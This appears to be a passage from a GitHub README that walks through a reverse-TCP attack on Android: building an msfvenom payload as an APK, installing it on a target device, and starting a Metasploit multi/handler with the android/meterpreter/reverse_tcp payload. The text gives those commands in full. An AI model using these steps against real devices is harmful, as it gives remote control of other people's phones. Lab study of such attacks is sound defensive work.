amalrajpc/Reverse-TCP-Attack-on-Android-Box/README.md

 ![msfvenom](https://github.com/amalrajpc/Reverse-TCP-Vulnerability/assets/102909507/78456489-0775-4a95-91db-e4d886252dbf)

+once the payload is created, Attacker move this payload into target device.
+In thase case of android based devices, attaker create paload in the form of Android apk and install this apk in the target device.

 Open the Metasploit console in the kali Linux terminal by typing "msfconsole."
 After the Metasploit console opens, then type the command "use multi/handler" Next set the payload by typing "set payload android/meterpreter/reverse_tcp"